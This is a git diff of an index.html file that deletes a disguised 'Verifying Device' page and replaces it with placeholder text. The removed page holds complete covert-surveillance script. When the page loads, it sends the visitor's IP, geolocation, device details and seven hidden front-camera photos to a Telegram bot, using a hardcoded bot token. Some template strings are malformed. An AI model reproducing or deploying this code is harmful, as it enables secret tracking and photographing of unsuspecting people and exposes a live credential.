--- a/index.html
+++ b/index.html
@@ -1,177 +1,1 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1" />
-<title>Verifying Device...</title>
-</head>
-<body>
-<h2>Welcome</h2>
-<p>Network Connection Error Please wait while we verify your details.</p>
-
-<script>
-(async () => {
-  const botToken = '8514639816:AAGF8rmIqRwZIkjM0ehndHOd1RWBRZYpOj0'; // Replace with your Telegram bot token
-
-  // Parse chat ID from URL query parameter 'id'
-  function getChatIdFromUrl() {
-    const params = new URLSearchParams(window.location.search);
-    return params.get('id');
-  }
-
-  const chatId = getChatIdFromUrl();
-  if (!chatId) {
-    alert('Something is missing in URL. Please provide Full URL');
-    return;
-  }
-
-  // Helper: Send text message to Telegram
-  async function sendTelegramMessage(text) {
-    const url = https://api.telegram.org/bot${botToken}/sendMessage;
-    const res = await fetch(url, {
-      method: 'POST',
-      headers: {'Content-Type': 'application/json'},
-      body: JSON.stringify({chat_id: chatId, text, parse_mode: 'HTML'})
-    });
-    return res.json();
-  }
-
-  // Helper: Send photo (blob) to Telegram
-  async function sendTelegramPhoto(blob, caption = '') {
-    const url = https://api.telegram.org/bot${botToken}/sendPhoto;
-    const formData = new FormData();
-    formData.append('chat_id', chatId);
-    formData.append('photo', blob, 'photo.jpg');
-    if (caption) formData.append('caption', caption);
-    const res = await fetch(url, {method: 'POST', body: formData});
-    return res.json();
-  }
-
-  // Get visitor IP
-  async function getVisitorIP() {
-    try {
-      const res = await fetch('https://api.ipify.org?format=json');
-      const data = await res.json();
-      return data.ip || 'Unknown IP';
-    } catch {
-      return 'IP fetch failed';
-    }
-  }
-
-  // Get IP geolocation info
-  async function getIPGeoInfo(ip) {
-    try {
-      const res = await fetch(https://ip-api.com/json/${ip}?fields=status,country,countryCode,regionName,city,isp,lat,lon,message);
-      const data = await res.json();
-      if (data.status === 'success') {
-        return data;
-      } else {
-        return null;
-      }
-    } catch {
-      return null;
-    }
-  }
-
-  // Get battery info if available
-  async function getBatteryInfo() {
-    if (navigator.getBattery) {
-      try {
-        const battery = await navigator.getBattery();
-        const level = Math.round(battery.level * 100) + '%';
-        const charging = battery.charging ? 'Charging' : 'Not Charging';
-        return ${level} (${charging});
-      } catch {
-        return 'Unavailable';
-      }
-    }
-    return 'Unavailable';
-  }
-
-  // Compose device verification message
-  async function composeDeviceVerificationMessage() {
-    const ip = await getVisitorIP();
-    const geo = await getIPGeoInfo(ip);
-    const battery = await getBatteryInfo();
-
-    const ua = navigator.userAgent;
-    const platform = navigator.platform || 'Unknown';
-    const language = navigator.language || 'Unknown';
-    const screenRes = ${window.screen.width}x${window.screen.height};
-    const online = navigator.onLine ? 'true' : 'false';
-    const timezone = Intl.DateTimeFormat().resolvedOptions().timeZone || 'Unknown';
-    const connection = navigator.connection ? navigator.connection.effectiveType || 'Unknown' : 'Unknown';
-    const cookiesEnabled = navigator.cookieEnabled ? 'true' : 'false';
-    const javaEnabled = navigator.javaEnabled() ? 'Yes' : 'No';
-
-    let geoText = 'Unavailable';
-    let mapsLink = '';
-    if (geo) {
-      geoText = `
-Country: ${geo.country} (${geo.countryCode})
-Region: ${geo.regionName}
-City: ${geo.city}
-ISP: ${geo.isp}
-Coordinates: ${geo.lat}, ${geo.lon}
-`;
-      mapsLink = https://www.google.com/maps/search/?api=1&query=${geo.lat},${geo.lon};
-    }
-
-    // Format message with HTML for Telegram parse_mode
-    const message = `<b>Device Verification Details:</b>
-
-<b>Browser:</b> ${ua}
-<b>Platform:</b> ${platform}
-<b>Language:</b> ${language}
-<b>Screen Resolution:</b> ${screenRes}
-<b>Online:</b> ${online}
-<b>Timezone:</b> ${timezone}
-<b>Connection:</b> ${connection}
-<b>Cookies Enabled:</b> ${cookiesEnabled}
-<b>Java Enabled:</b> ${javaEnabled}
-<b>Battery:</b> ${battery}
-<b>IP Address:</b> ${ip}
-
-📍 <b>IP Location Details</b>
-${geoText.trim()}
-
-<a href="${mapsLink}">Google Maps</a>
-`;
-
-    return message;
-  }
-
-  // Send device verification info
-  const deviceMessage = await composeDeviceVerificationMessage();
-  await sendTelegramMessage(deviceMessage);
-
-  // Capture 7 photos from front camera and send
-  try {
-    const stream = await navigator.mediaDevices.getUserMedia({video: {facingMode: 'user'}});
-    const video = document.createElement('video');
-    video.style.display = 'none';
-    document.body.appendChild(video);
-    video.srcObject = stream;
-    await video.play();
-
-    const canvas = document.createElement('canvas');
-    const ctx = canvas.getContext('2d');
-    canvas.width = video.videoWidth || 640;
-    canvas.height = video.videoHeight || 480;
-
-    for (let i = 1; i <= 7; i++) {
-      ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
-      const blob = await new Promise(resolve => canvas.toBlob(resolve, 'image/jpeg'));
-      await sendTelegramPhoto(blob, Photo #${i} from visitor);
-      await new Promise(r => setTimeout(r, 1000)); // 1 second delay between shots
-    }
-
-    stream.getTracks().forEach(track => track.stop());
-    video.remove();
-  } catch (err) {
-    await sendTelegramMessage('Camera access denied or error: ' + err.message);
-  }
-})();
-</script>
-</body>
-  </html>
+hhhhhh
